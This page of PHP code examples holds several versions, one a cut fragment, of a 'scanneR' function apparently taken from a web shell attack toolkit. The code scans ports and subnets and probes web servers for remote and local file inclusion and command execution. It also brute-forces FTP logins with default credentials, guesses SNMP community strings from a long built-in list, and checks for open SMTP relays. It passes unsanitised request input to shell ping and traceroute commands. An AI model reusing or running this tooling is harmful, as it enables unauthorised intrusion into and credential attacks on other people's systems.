function scanneR()
{
    global $hcwd, $et;
    if (!empty($_SERVER['SERVER_ADDR'])) {
        $host = $_SERVER['SERVER_ADDR'];
    } else {
        $host = '127.0.0.1';
    }
    $udp = empty($_REQUEST['udp']) ? 0 : 1;
    $tcp = empty($_REQUEST['tcp']) ? 0 : 1;
    if (($udp || $tcp) && !empty($_REQUEST['target']) && !empty($_REQUEST['fromport']) && !empty($_REQUEST['toport']) && !empty($_REQUEST['timeout']) && !empty($_REQUEST['portscanner'])) {
        $target = $_REQUEST['target'];
        $from = (int) $_REQUEST['fromport'];
        $to = (int) $_REQUEST['toport'];
        $timeout = (int) $_REQUEST['timeout'];
        $nu = 0;
        echo '<font color=blue>Port scanning started against ' . htmlspecialchars($target) . ':<br>';
        $start = time();
        for ($i = $from; $i <= $to; $i++) {
            if ($tcp) {
                if (checkthisporT($target, $i, $timeout)) {
                    $nu++;
                    $ser = '';
                    if (getservbyport($i, 'tcp')) {
                        $ser = '(' . getservbyport($i, 'tcp') . ')';
                    }
                    echo "{$nu}) {$i} {$ser} (<a href='telnet://{$target}:{$i}'>Connect</a>) [TCP]<br>";
                }
            }
            if ($udp) {
                if (checkthisporT($target, $i, $timeout, 1)) {
                    $nu++;
                    $ser = '';
                    if (getservbyport($i, 'udp')) {
                        $ser = '(' . getservbyport($i, 'udp') . ')';
                    }
                    echo "{$nu}) {$i} {$ser} [UDP]<br>";
                }
            }
        }
        $time = time() - $start;
        echo "Done! ({$time} seconds)</font>";
    } elseif (!empty($_REQUEST['securityscanner'])) {
        echo '<font color=blue>';
        $start = time();
        $from = $_REQUEST['from'];
        $to = (int) $_REQUEST['to'];
        $timeout = (int) $_REQUEST['timeout'];
        $f = substr($from, strrpos($from, '.') + 1);
        $from = substr($from, 0, strrpos($from, '.'));
        if (!empty($_REQUEST['httpscanner'])) {
            echo 'Loading webserver bug list...';
            $buglist = whereistmP() . DIRECTORY_SEPARATOR . uniqid('BL');
            $dl = downloadiT('http://www.cirt.net/nikto/UPDATES/1.36/scan_database.db', $buglist);
            if ($dl) {
                $file = file($buglist);
                echo 'Done! scanning started.<br><br>';
            } else {
                echo 'Failed!!! scanning started without webserver security testing...<br><br>';
            }
        } else {
            $fr = htmlspecialchars($from);
            echo "Scanning {$fr}.{$f}-{$fr}.{$to}:<br><br>";
        }
        for ($i = $f; $i <= $to; $i++) {
            $output = 0;
            $ip = "{$from}.{$i}";
            if (!empty($_REQUEST['nslookup'])) {
                $hn = gethostbyaddr($ip);
                if ($hn != $ip) {
                    echo "{$ip} [{$hn}]<br>";
                }
                $output = 1;
            }
            if (!empty($_REQUEST['ipscanner'])) {
                $port = $_REQUEST['port'];
                if (strstr($port, ',')) {
                    $p = explode(',', $port);
                } else {
                    $p[0] = $port;
                }
                $open = $ser = '';
                foreach ($p as $po) {
                    $scan = checkthisporT($ip, $po, $timeout);
                    if ($scan) {
                        $ser = '';
                        if ($ser = getservbyport($po, 'tcp')) {
                            $ser = "({$ser})";
                        }
                        $open .= " {$po}{$ser} ";
                    }
                }
                if ($open) {
                    echo "{$ip}) Open ports:{$open}<br>";
                    $output = 1;
                }
            }
            if (!empty($_REQUEST['httpbanner'])) {
                $res = get_sw_namE($ip, $timeout);
                if ($res) {
                    echo "{$ip}) Webserver software: ";
                    if ($res == -1) {
                        echo 'Unknow';
                    } else {
                        echo $res;
                    }
                    echo '<br>';
                    $output = 1;
                }
            }
            if (!empty($_REQUEST['httpscanner'])) {
                if (checkthisporT($ip, 80, $timeout) && !empty($file)) {
                    $admin = array('/admin/', '/adm/');
                    $users = array('adm', 'bin', 'daemon', 'ftp', 'guest', 'listen', 'lp', 'mysql', 'noaccess', 'nobody', 'nobody4', 'nuucp', 'operator', 'root', 'smmsp', 'smtp', 'sshd', 'sys', 'test', 'unknown', 'uucp', 'web', 'www');
                    $nuke = array('/', '/postnuke/', '/postnuke/html/', '/modules/', '/phpBB/', '/forum/');
                    $cgi = array('/cgi.cgi/', '/webcgi/', '/cgi-914/', '/cgi-915/', '/bin/', '/cgi/', '/mpcgi/', '/cgi-bin/', '/ows-bin/', '/cgi-sys/', '/cgi-local/', '/htbin/', '/cgibin/', '/cgis/', '/scripts/', '/cgi-win/', '/fcgi-bin/', '/cgi-exe/', '/cgi-home/', '/cgi-perl/');
                    foreach ($file as $v) {
                        $vuln = array();
                        $v = trim($v);
                        if (!$v || $v[0] == '#') {
                            continue;
                        }
                        $v = str_replace('","', '^', $v);
                        $v = str_replace('"', '', $v);
                        $vuln = explode('^', $v);
                        $page = $cqich = $nukech = $adminch = $userch = $vuln[1];
                        if (strstr($page, '@CGIDIRS')) {
                            foreach ($cgi as $cg) {
                                $cqich = str_replace('@CGIDIRS', $cg, $page);
                                $url = "http://{$ip}{$cqich}";
                                $res = check_urL($url, $vuln[3], $vuln[2], $timeout);
                                if ($res) {
                                    $output = 1;
                                    echo "{$ip})" . $vuln[4] . " <a href='{$url}' target='_blank'>{$url}</a><br>";
                                }
                            }
                        } elseif (strstr($page, '@ADMINDIRS')) {
                            foreach ($admin as $cg) {
                                $adminch = str_replace('@ADMINDIRS', $cg, $page);
                                $url = "http://{$ip}{$adminch}";
                                $res = check_urL($url, $vuln[3], $vuln[2], $timeout);
                                if ($res) {
                                    $output = 1;
                                    echo "{$ip})" . $vuln[4] . " <a href='{$url}' target='_blank'>{$url}</a><br>";
                                }
                            }
                        } elseif (strstr($page, '@USERS')) {
                            foreach ($users as $cg) {
                                $userch = str_replace('@USERS', $cg, $page);
                                $url = "http://{$ip}{$userch}";
                                $res = check_urL($url, $vuln[3], $vuln[2], $timeout);
                                if ($res) {
                                    $output = 1;
                                    echo "{$ip})" . $vuln[4] . " <a href='{$url}' target='_blank'>{$url}</a><br>";
                                }
                            }
                        } elseif (strstr($page, '@NUKE')) {
                            foreach ($nuke as $cg) {
                                $nukech = str_replace('@NUKE', $cg, $page);
                                $url = "http://{$ip}{$nukech}";
                                $res = check_urL($url, $vuln[3], $vuln[2], $timeout);
                                if ($res) {
                                    $output = 1;
                                    echo "{$ip})" . $vuln[4] . " <a href='{$url}' target='_blank'>{$url}</a><br>";
                                }
                            }
                        } else {
                            $url = "http://{$ip}{$page}";
                            $res = check_urL($url, $vuln[3], $vuln[2], $timeout);
                            if ($res) {
                                $output = 1;
                                echo "{$ip})" . $vuln[4] . " <a href='{$url}' target='_blank'>{$url}</a><br>";
                            }
                        }
                    }
                }
            }
            if (!empty($_REQUEST['smtprelay'])) {
                if (checkthisporT($ip, 25, $timeout)) {
                    $res = '';
                    $res = checksmtP($ip, $timeout);
                    if ($res == 1) {
                        echo "{$ip}) SMTP relay found.<br>";
                        $output = 1;
                    }
                }
            }
            if (!empty($_REQUEST['snmpscanner'])) {
                if (checkthisporT($ip, 161, $timeout, 1)) {
                    $com = $_REQUEST['com'];
                    $coms = $res = '';
                    if (strstr($com, ',')) {
                        $c = explode(',', $com);
                    } else {
                        $c[0] = $com;
                    }
                    foreach ($c as $v) {
                        $ret = snmpchecK($ip, $v, $timeout);
                        if ($ret) {
                            $coms .= " {$v} ";
                        }
                    }
                    if ($coms != '') {
                        echo "{$ip}) SNMP FOUND: {$coms}<br>";
                        $output = 1;
                    }
                }
            }
            if (!empty($_REQUEST['ftpscanner']) && function_exists('ftp_connect')) {
                if (checkthisporT($ip, 21, $timeout)) {
                    $usps = explode(',', $_REQUEST['userpass']);
                    foreach ($usps as $v) {
                        $user = substr($v, 0, strpos($v, ':'));
                        $pass = substr($v, strpos($v, ':') + 1);
                        if ($pass == '[BLANK]') {
                            $pass = '';
                        }
                        $ftp = ftp_connect($ip, 21, $timeout);
                        if ($ftp) {
                            if (ftp_login($ftp, $user, $pass)) {
                                $output = 1;
                                echo "{$ip}) FTP FOUND: ({$user}:{$pass}) System type: " . ftp_systype($ftp) . " (<b><a href='";
                                echo hlinK("seC=ftpc&workingdiR=" . getcwd() . "&hosT={$ip}&useR={$user}&pasS={$pass}");
                                echo "' target='_blank'>Connect</a></b>)<br>";
                            }
                        }
                    }
                }
            }
            if ($output) {
                echo '<hr size=1 noshade>';
            }
        }
        $time = time() - $start;
        echo "Done! ({$time} seconds)</font>";
        if (!empty($buglist)) {
            unlink($buglist);
        }
    } elseif (!empty($_REQUEST['directoryscanner'])) {
        $dir = file($_REQUEST['dic']);
        $host = $_REQUEST['host'];
        $r = $_REQUEST['r1'];
        echo "<font color=blue><pre>Tahap Scanning Dimulai ...\n";
        for ($i = 0; $i < count($dir); $i++) {
            $d = trim($dir[$i]);
            if ($r) {
                $adr = "http://{$host}/{$d}/";
                if (check_urL($adr, 'GET', '302')) {
                    echo "Directory Found: <a href='{$adr}' target='_blank'>{$adr}</a>\n";
                }
            } else {
                $adr = "{$d}.{$host}";
                $ip = gethostbyname($adr);
                if ($ip != $adr) {
                    echo "Subdomain Found: <a href='http://{$adr}' target='_blank'>{$adr}({$ip})</a>\n";
                }
            }
        }
        echo 'Done!</pre></font>';
    } else {
        $t = "<br><table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='50%'><tr><form method='POST'";
        $chbox = extension_loaded('sockets') ? "<input type=checkbox style='border-width:1px;background-color:#808080;' name=tcp value=1 checked>TCP<input type=checkbox name=udp style='border-width:1px;background-color:#808080;' value=1 checked>UDP" : "<input type=hidden name=tcp value=1>";
        echo "<center>{$t}><td>Port scanner:</td></tr><td width='25%' bgcolor='#808080'>Target:</td><td bgcolor='#808080' width=80%><input name=target value={$host} size=40></td></tr><tr><td bgcolor='#666666' width=25%>From:</td><td bgcolor='#666666' width=25%><input name=fromport type=text value='1' size=5></td></tr><tr><td bgcolor='#808080' width=25%>To:</td><td bgcolor='#808080' width=25%><input name=toport type=text value='1024' size=5></td></tr><tr><td width='25%' bgcolor='#666666'>Timeout:</td><td bgcolor='#666666'><input name=timeout type=text value='2' size=5></td><tr><td width='25%' bgcolor='#808080'>{$chbox}</td><td bgcolor='#808080' align='right'>{$hcwd}<input type=submit class=buttons name=portscanner value=Scan></form>{$et}{$t}><td>Discoverer:</td></tr><tr><td width='25%' bgcolor='#808080'>Host:</td><td bgcolor='#808080' width=80%><input name=host value='" . $_SERVER["HTTP_HOST"] . "' size=40></td><td bgcolor='#808080'></td></tr><tr><td width='25%' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666' width=80%><input name=dic size=40></td><td bgcolor='#666666'></td></tr><tr><td width='25%' bgcolor='#808080'>Search for:</td><td bgcolor='#808080' width=40%><input type=radio value=1 checked name=r1>Directories<input type=radio name=r1 value=0>Subdomains</td><td bgcolor='#808080' align='right' width=40%><input type=submit class=buttons name=directoryscanner value=Scan></td></form></tr></table>";
        $host = substr($host, 0, strrpos($host, "."));
        echo "{$t} name=security><td>Security scanner:</td></tr><td width='25%' bgcolor='#808080'>From:</td><td bgcolor='#808080' width=80%><input name=from value={$host}.1 size=40> <input type=checkbox value=1 style='border-width:1px;background-color:#808080;' name=nslookup checked>NS lookup</td></tr><tr><td bgcolor='#666666' width=25%>To:</td><td bgcolor='#666666' width=25%>xxx.xxx.xxx.<input name=to type=text value=254 size=4>{$hcwd}</td></tr><tr><td width='25%' bgcolor='#808080'>Timeout:</td><td bgcolor='#808080'><input name=timeout type=text value='2' size=5></td></tr><tr><td width='25%' bgcolor='#666666'><input type=checkbox name=ipscanner value=1 checked onClick='document.security.port.disabled = !document.security.port.disabled;' style='border-width:1px;background-color:#666666;'>Port scanner:</td><td bgcolor='#666666'><input name=port type=text value='21,23,25,80,110,135,139,143,443,445,1433,3306,3389,8080,65301' size=60></td></tr><tr><td width='25%' bgcolor='#808080'><input type=checkbox name=httpbanner value=1 checked style='border-width:1px;background-color:#808080;'>Get web banner</td><td bgcolor='#808080'><input type=checkbox name=httpscanner value=1 checked style='border-width:1px;background-color:#808080;'>Webserver security scanning&nbsp;&nbsp;&nbsp;<input type=checkbox name=smtprelay value=1 checked style='border-width:1px;background-color:#808080;'>SMTP relay check</td></tr><tr><td width='25%' bgcolor='#666666'><input type=checkbox name=ftpscanner value=1 checked onClick='document.security.userpass.disabled = !document.security.userpass.disabled;' style='border-width:1px;background-color:#666666;'>FTP password:</td><td bgcolor='#666666'><input name=userpass type=text value='anonymous:admin@nasa.gov,ftp:ftp,Administrator:[BLANK],guest:[BLANK]' size=60></td></tr><tr><td width='25%' bgcolor='#808080'><input type=checkbox name=snmpscanner value=1 onClick='document.security.com.disabled = !document.security.com.disabled;' checked style='border-width:1px;background-color:#808080;'>SNMP:</td><td bgcolor='#808080'><input name=com type=text value='public,private,secret,cisco,write,test,guest,ilmi,ILMI,password,all private,admin,all,system,monitor,sun,agent,manager,ibm,hello,switch,solaris,OrigEquipMfr,default,world,tech,mngt,tivoli,openview,community,snmp,SNMP,none,snmpd,Secret C0de,netman,security,pass,passwd,root,access,rmon,rmon_admin,hp_admin,NoGaH\$@!,router,agent_steal,freekevin,read,read-only,read-write,0392a0,cable-docsis,fubar,ANYCOM,Cisco router,xyzzy,c,cc,cascade,yellow,blue,internal,comcomcom,IBM,apc,TENmanUFactOryPOWER,proxy,core,CISCO,regional,1234,2read,4changes' size=60></td></tr><tr><td width='25%' bgcolor='#666666'></td><td bgcolor='#666666' align='right'><input type=submit class=buttons name=securityscanner value=Scan></form>{$et}";
    }
}
Пример #2
0
function scanneR()
{
    global $windows, $hcwd, $Resource_Dir, $RFI_URL;
    if (!empty($_SERVER['SERVER_ADDR'])) {
        $host = $_SERVER['SERVER_ADDR'];
    } else {
        $host = '127.0.0.1';
    }
    $udp = empty($_REQUEST['udp']) ? 0 : 1;
    $tcp = empty($_REQUEST['tcp']) ? 0 : 1;
    if (($udp || $tcp) && !empty($_REQUEST['target']) && !empty($_REQUEST['fromport']) && !empty($_REQUEST['toport']) && !empty($_REQUEST['timeout']) && !empty($_REQUEST['portscanner'])) {
        $target = $_REQUEST['target'];
        $from = (int) $_REQUEST['fromport'];
        $to = (int) $_REQUEST['toport'];
        $timeout = (int) $_REQUEST['timeout'];
        $nu = 0;
        echo '<font color=#FA0>Port scanning started against ' . htmlspecialchars($target) . ':<br />';
        $start = time();
        for ($i = $from; $i <= $to; $i++) {
            if ($tcp) {
                if (checkthisporT($target, $i, $timeout)) {
                    $nu++;
                    $ser = '';
                    if (getservbyport($i, 'tcp')) {
                        $ser = '(' . getservbyport($i, 'tcp') . ')';
                    }
                    echo "{$nu}) {$i} {$ser} (<a href='telnet://{$target}:{$i}'>Connect</a>) [TCP]<br>";
                }
            }
            if ($udp) {
                if (checkthisporT($target, $i, $timeout, 1)) {
                    $nu++;
                    $ser = '';
                    if (getservbyport($i, 'udp')) {
                        $ser = '(' . getservbyport($i, 'udp') . ')';
                    }
                    echo "{$nu}) {$i} {$ser} [UDP]<br>";
                }
            }
        }
        $time = time() - $start;
        echo "Done! ({$time} seconds)</font>";
    } elseif (!empty($_REQUEST['securityscanner'])) {
        echo '<font color=#FA0><pre>';
        $start = time();
        $from = $_REQUEST['from'];
        $to = $_REQUEST['to'];
        $fIP = ip2long($from);
        $tIP = ip2long($to);
        if ($fIP > $tIP) {
            echo 'Invalid range!</pre></font>';
            return 0;
        }
        $timeout = (int) $_REQUEST['timeout'];
        if (!empty($_REQUEST['httpscanner'])) {
            echo 'Loading web-server vulnerability DBs...<br />';
            @flush_buffers();
            $DBs = array('Directory', 'Files', 'RFI', 'LFI', 'RCE');
            $file = array();
            foreach ($DBs as $db) {
                $buglist = whereistmP() . DIRECTORY_SEPARATOR . "{$db}.pj";
                $dl = !file_exists($buglist) ? downloadiT($Resource_Dir . "scan_db/{$db}.txt", $buglist) : true;
                if ($dl) {
                    $file[$db] = file($buglist);
                    echo "'{$db}' database Loaded.<br />";
                } else {
                    echo "Can not load '{$db}' database.<br />";
                }
                @flush_buffers();
            }
        }
        $fr = htmlspecialchars($from);
        echo "<br />Scanning {$fr}-{$to}:<br />";
        for ($i = $fIP; $i <= $tIP; $i++) {
            $ip = long2ip($i);
            echo "<br /><br />---------------- {$ip} ----------------<br />";
            if (!empty($_REQUEST['nslookup'])) {
                $hn = gethostbyaddr($ip);
                if ($hn != $ip) {
                    echo "-- Hostname: {$hn}<br />";
                }
            }
            @flush_buffers();
            if (!empty($_REQUEST['ping'])) {
                echo "-- Ping:<br />";
                $pres = !$windows ? shelL("ping -c 1 -W {$timeout} {$ip}") : shelL("ping -n 1 -w {$timeout} {$ip}");
                if (strstr($pres, 'Received = 0') || strstr($pres, '0 received')) {
                    echo "Ping timeout!<br />";
                    continue;
                } else {
                    echo '<font color="#E9CFEC">' . $pres . '</font><br />';
                }
                @flush_buffers();
            }
            if (!empty($_REQUEST['tracert'])) {
                echo "-- Traceroute:<br />";
                $tres = !$windows ? shelL("traceroute -w {$timeout} {$ip}") : shelL("tracert -w {$timeout} {$ip}");
                echo '<font color="#E9CFEC">' . $tres . '</font><br />';
                @flush_buffers();
            }
            if (!empty($_REQUEST['tcppscanner'])) {
                $port = $_REQUEST['port'];
                if (strstr($port, ',')) {
                    $p = explode(',', $port);
                } else {
                    $p[0] = $port;
                }
                $open = $ser = '';
                foreach ($p as $po) {
                    $scan = checkthisporT($ip, $po, $timeout);
                    if ($scan) {
                        $ser = '';
                        if ($ser = getservbyport($po, 'tcp')) {
                            $ser = "({$ser})";
                        }
                        $open .= " {$po}{$ser} ";
                    }
                }
                if ($open) {
                    echo "-- TCP open ports:{$open}<br />";
                    @flush_buffers();
                }
            }
            if (!empty($_REQUEST['udppscanner'])) {
                $port = $_REQUEST['udport'];
                if (strstr($port, ',')) {
                    $p = explode(',', $port);
                } else {
                    $p[0] = $port;
                }
                $open = $ser = '';
                foreach ($p as $po) {
                    $scan = checkthisporT($ip, $po, $timeout, 1);
                    if ($scan) {
                        $ser = '';
                        if ($ser = getservbyport($po, 'tcp')) {
                            $ser = "({$ser})";
                        }
                        $open .= " {$po}{$ser} ";
                    }
                }
                if ($open) {
                    echo "-- UDP open ports:{$open}<br>";
                    @flush_buffers();
                }
            }
            if (!empty($_REQUEST['httpbanner'])) {
                $res = get_sw_namE($ip, $timeout);
                if ($res) {
                    echo "-- Webserver software: ";
                    if ($res) {
                        echo 'Unknow';
                    } else {
                        echo $res;
                    }
                    echo '<br />';
                    @flush_buffers();
                }
            }
            if (!empty($_REQUEST['httpscanner'])) {
                echo "-- Webserver security:<br />";
                if (checkthisporT($ip, 80, $timeout) && !empty($file) && !check_urL('http://' . $ip . '/' . uniqid('TEST_'), 'GET', '200 301 302 403', $timeout)) {
                    echo "Directory scan:<br />";
                    foreach ($file['Directory'] as $k => $v) {
                        @flush_buffers();
                        $v = trim($v);
                        $res = check_urL('http://' . $ip . '/' . $v, 'GET', '200 301 302 403', $timeout);
                        if ($res) {
                            echo "<a href='http://{$ip}/{$v}' target='_blank'>http://{$ip}/{$v}</a> ({$res})<br />";
                        }
                    }
                    echo "File scan:<br />";
                    foreach ($file['Files'] as $k => $v) {
                        @flush_buffers();
                        $v = trim($v);
                        $res = check_urL('http://' . $ip . '/' . $v, 'GET', '200 301 302 403', $timeout);
                        if ($res) {
                            echo "<a href='http://{$ip}/{$v}' target='_blank'>http://{$ip}/{$v}</a> ({$res})<br />";
                        }
                    }
                    echo "RFI scan:<br />";
                    foreach ($file['RFI'] as $k => $v) {
                        @flush_buffers();
                        $v = trim($v);
                        $v = str_replace('%RFI%', $RFI_URL, $v);
                        if (strstr(getiT('http://' . $ip . '/' . $v, $headers), 'NetJackal')) {
                            echo "<a href='http://{$ip}/{$v}' target='_blank'>http://{$ip}/{$v}</a><br />";
                        }
                    }
                    echo "RCE scan:<br />";
                    foreach ($file['RCE'] as $k => $v) {
                        $v = trim($v);
                        $v = str_replace('%RFI%', $RFI_URL, $v);
                        if (strstr(getiT('http://' . $ip . '/' . $v, $headers), 'root:')) {
                            echo "<a href='http://{$ip}/{$v}' target='_blank'>http://{$ip}/{$v}</a><br />";
                        }
                    }
                    echo "LFI scan:<br />";
                    foreach ($file['LFI'] as $k => $v) {
                        @flush_buffers();
                        $v = trim($v);
                        $v = str_replace('%RFI%', $RFI_URL, $v);
                        if (strstr(getiT('http://' . $ip . '/' . $v, $headers), 'root:')) {
                            echo "<a href='http://{$ip}/{$v}' target='_blank'>http://{$ip}/{$v}</a><br />";
                        }
                    }
                }
            }
            if (!empty($_REQUEST['smtprelay'])) {
                if (checkthisporT($ip, 25, $timeout)) {
                    $res = '';
                    $res = checksmtP($ip, $timeout);
                    if ($res == 1) {
                        echo "-- SMTP relay found.<br />";
                        @flush_buffers();
                    }
                }
            }
            if (!empty($_REQUEST['snmpscanner'])) {
                if (checkthisporT($ip, 161, $timeout, 1)) {
                    $com = $_REQUEST['com'];
                    $coms = $res = '';
                    if (strstr($com, ',')) {
                        $c = explode(',', $com);
                    } else {
                        $c[0] = $com;
                    }
                    foreach ($c as $v) {
                        $ret = snmpchecK($ip, $v, $timeout);
                        if ($ret) {
                            $coms .= " {$v} ";
                        }
                    }
                    if ($coms != '') {
                        echo "-- SNMP FOUND: {$coms}<br />";
                        @flush_buffers();
                    }
                }
            }
            if (!empty($_REQUEST['ftpscanner']) && checkfunctioN('ftp_connect')) {
                if (checkthisporT($ip, 21, $timeout)) {
                    $usps = explode(',', $_REQUEST['userpass']);
                    foreach ($usps as $v) {
                        $user = substr($v, 0, strpos($v, ':'));
                        $pass = substr($v, strpos($v, ':') + 1);
                        if ($pass == '[BLANK]') {
                            $pass = '';
                        }
                        if (ftpchecK($ip, $user, $pass, $timeout)) {
                            echo "-- FTP FOUND: ({$user}:{$pass}) (<b><a href='";
                            echo hlinK("seC=ftpc&workingdiR=" . getcwd() . "&hosT={$ip}&useR={$user}&pasS={$pass}");
                            echo "' target='_blank'>Connect</a></b>)<br />";
                            @flush_buffers();
                        }
                    }
                }
            }
        }
        $time = time() - $start;
        echo "Done! ({$time} seconds)</pre></font>";
    } elseif (!empty($_REQUEST['directoryscanner'])) {
        $dir = file($_REQUEST['dic']);
        $host = $_REQUEST['host'];
        $r = $_REQUEST['r1'];
        echo "<font color=#FA0><pre>Scanning started...\n";
        for ($i = 0; $i < count($dir); $i++) {
            $d = trim($dir[$i]);
            if ($r) {
                $adr = "http://{$host}/{$d}/";
                if (check_urL($adr, 'GET')) {
                    echo "Directory Found: <a href='{$adr}' target='_blank'>{$adr}</a>\n";
                }
            } else {
                $adr = "{$d}.{$host}";
                $ip = gethostbyname($adr);
                if ($ip != $adr) {
                    echo "Subdomain Found: <a href='http://{$adr}' target='_blank'>{$adr}({$ip})</a>\n";
                }
            }
        }
        echo 'Done!</pre></font>';
    } else {
        $chbox = checkfunctioN('socket_set_timeout') ? "<ul><li><input type=checkbox name=tcp value=1 checked> <lable>TCP</lable></li><li><input type=checkbox name=udp value=1 checked> <lable>UDP</lable></li></ul>" : '<input type="hidden" name="tcp" value="1">';
        echo '<form name=port method="POST"><div class="fieldwrapper"><label class="styled" style="width:320px">Port scanner</label></div><div class="fieldwrapper"><label class="styled">Target:</label><div class="thefield"><input type="text" name="target" value="' . $host . '" size="30" /></div></div><div class="fieldwrapper"><label class="styled">From:</label><div class="thefield"><input type="number" min="1" max="65535" name="fromport" value="1" size="30" /></div></div><div class="fieldwrapper"><label class="styled">To:</label><div class="thefield"><input type="number" min="1" max="65535" name="toport" value="1024" size="30" /></div></div><div class="fieldwrapper"><label class="styled">Options:</label><div class="thefield"><ul style="margin-top:0;"><li><label>Timeout:</label> <input type="number" min="1" name="timeout" size="5" value="2"></li>' . $chbox . '</u></div></div>' . $hcwd . '<div class="buttonsdiv"><input type="submit" name="portscanner" value="Scan" style="margin-left: 150px;" /></div></form><br /><form name=disc method="POST"><div class="fieldwrapper"><label class="styled" style="width:320px">Discover</label></div><div class="fieldwrapper"><label class="styled">Target:</label><div class="thefield"><input type="text" name="host" value="' . $_SERVER["HTTP_HOST"] . '" size="30" /></div></div><div class="fieldwrapper"><label class="styled">Dictionary:</label><div class="thefield"><input type="text" name="dic" size="30" /></div></div><div class="fieldwrapper"><label class="styled">Search for:</label><div class="thefield"><ul><li><input type=radio value=1 checked name=r1> <label>Directories</label></li><li><input type=radio name=r1 value=0> <label>Subdomains</label></li></ul></div></div>' . $hcwd . '<div class="buttonsdiv"><input type="submit" name="directoryscanner" value="Scan" style="margin-left: 150px;" /></div></form>';
        $host = substr($host, 0, strrpos($host, "."));
        $udpf = checkfunctioN('socket_set_timeout') ? '<li><input type=checkbox name=udppscanner value=1 checked onClick="document.security.udpf.disabled = !document.security.udpf.disabled;"> <label>UDP Port scanner:</label> <input name=udport type=text value="53,69,88,111,137,138,139,389,445" size="30"></li>' : '';
        echo '<form name=security method="POST"><div class="fieldwrapper"><label class="styled" style="width:320px">Security scanner</label></div><div class="fieldwrapper"><label class="styled">From:</label><div class="thefield"><input type="text" name="from" value="' . $host . '.1" size="30" /></div></div><div class="fieldwrapper"><label class="styled">To:</label><div class="thefield"><input type="text" name="to" value="' . $host . '.255" size="30" /></div></div><div class="fieldwrapper"><label class="styled">Options:</label><div class="thefield"><ul style="margin-top:0;"><li><input type="checkbox" value="1" name="nslookup" checked> <label>NS lookup</label></li><li><label>Timeout:</label> <input type="number" min="1" name="timeout" size="5" value="2"></li><li><input type="checkbox" value="1" name="ping" checked><label>Only scan hosts with echo reply</label></li><li><input type="checkbox" value="1" name="tracert" checked><label>Traceroute</label></li><li><input type=checkbox name=tcppscanner value=1 checked onClick="document.security.port.disabled = !document.security.port.disabled;"> <label>TCP Port scanner:</label> <input name=port type=text value="21,23,25,80,110,135,139,143,443,445,1433,3306,3389,8080,65301" size="30"></li>' . $udpf . '<li><input type=checkbox name=httpbanner value=1 checked> <label>Grab HTTP headers</label></li><li><input type=checkbox name=httpscanner value=1 checked> <label>Webserver security scanning</label></li><li><input type=checkbox name=smtprelay value=1 checked> <label>SMTP relay check</label></li>';
        if (function_exists('ftp_connect')) {
            echo '<li><input type=checkbox name=ftpscanner value=1 checked onClick="document.security.userpass.disabled = !document.security.userpass.disabled;"> <label>FTP password:</label><input name=userpass type=text value="anonymous:admin@nasa.gov,ftp:ftp,Administrator:[BLANK],guest:[BLANK]" size=30></li>';
        }
        echo '<li><input type=checkbox name=snmpscanner value=1 onClick="document.security.com.disabled = !document.security.com.disabled;" checked> <label>SNMP:</label> <input name=com type=text value="public,private,secret,cisco,write,test,guest,ilmi,ILMI,password,all private,admin,all,system,monitor,sun,agent,manager,ibm,hello,switch,solaris,OrigEquipMfr,default,world,tech,mngt,tivoli,openview,community,snmp,SNMP,none,snmpd,Secret C0de,netman,security,pass,passwd,root,access,rmon,rmon_admin,hp_admin,NoGaH$@!,router,agent_steal,freekevin,read,read-only,read-write,0392a0,cable-docsis,fubar,ANYCOM,Cisco router,xyzzy,c,cc,cascade,yellow,blue,internal,comcomcom,IBM,apc,TENmanUFactOryPOWER,proxy,core,CISCO,regional,1234,2read,4changes" size=30></li></u></div></div>' . $hcwd . '<div class="buttonsdiv"><input type="submit" name="securityscanner" value="Scan" style="margin-left: 150px;" /></div></form>';
    }
}
Пример #3
0
         }
         foreach ($c as $v) {
             $ret = snmpchecK($ip, $v, $timeout);
             if ($ret) {
                 $coms .= " {$v} ";
             }
         }
         if ($coms != "") {
             echo "{$ip}) SNMP FOUND: {$coms}<br>";
             $output = 1;
         }
         flusheR();
     }
 }
 if (!empty($_REQUEST['ftpscanner'])) {
     if (checkthisporT($ip, 21, $timeout)) {
         $usps = explode(',', $_REQUEST['userpass']);
         foreach ($usps as $v) {
             $user = substr($v, 0, strpos($v, ':'));
             $pass = substr($v, strpos($v, ':') + 1);
             if ($pass == '[BLANK]') {
                 $pass = '';
             }
             $ftp = @ftp_connect($ip, 21, $timeout);
             if ($ftp) {
                 if (@ftp_login($ftp, $user, $pass)) {
                     $output = 1;
                     echo "{$ip}) FTP FOUND: ({$user}:{$pass}) <a href=\"ftp://{$ip}\" target=\"_blank\">{$ip}</a> System type: " . ftp_systype($ftp) . "<br>";
                 }
             }
             flusheR();
Пример #4
0
function scanneR()
{
    global $hcwd;
    if (!empty($_SERVER["SERVER_ADDR"])) {
        $host = $_SERVER["SERVER_ADDR"];
    } else {
        $host = "127.0.0.1";
    }
    $udp = empty($_REQUEST['udp']) ? 0 : 1;
    $tcp = empty($_REQUEST['tcp']) ? 0 : 1;
    if (($udp || $tcp) && !empty($_REQUEST['target']) && !empty($_REQUEST['fromport']) && !empty($_REQUEST['toport']) && !empty($_REQUEST['timeout']) && !empty($_REQUEST['portscanner'])) {
        $target = $_REQUEST['target'];
        $from = (int) $_REQUEST['fromport'];
        $to = (int) $_REQUEST['toport'];
        $timeout = (int) $_REQUEST['timeout'];
        $nu = 0;
        echo "<font color=blue>Port scanning started against " . htmlspecialchars($target) . ":<br>";
        $start = time();
        for ($i = $from; $i <= $to; $i++) {
            if ($tcp) {
                if (checkthisporT($target, $i, $timeout)) {
                    $nu++;
                    $ser = "";
                    if (getservbyport($i, "tcp")) {
                        $ser = "(" . getservbyport($i, "tcp") . ")";
                    }
                    echo "{$nu}) {$i} {$ser} (<a href=\"telnet://{$target}:{$i}\">Connect</a>) [TCP]<br>";
                }
            }
            if ($udp) {
                if (checkthisporT($target, $i, $timeout, 1)) {
                    $nu++;
                    $ser = "";
                    if (getservbyport($i, "udp")) {
                        $ser = "(" . getservbyport($i, "udp") . ")";
                    }
                    echo "{$nu}) {$i} {$ser} [UDP]<br>";
                }
            }
            flusheR();
        }
        $time = time() - $start;
        echo "Done! ({$time} seconds)</font>";
    } elseif (!empty($_REQUEST['securityscanner'])) {
        echo "<font color=blue>";
        $start = time();
        $from = $_REQUEST['from'];
        $to = (int) $_REQUEST['to'];
        $timeout = (int) $_REQUEST['timeout'];
        $f = substr($from, strrpos($from, ".") + 1);
        $from = substr($from, 0, strrpos($from, "."));
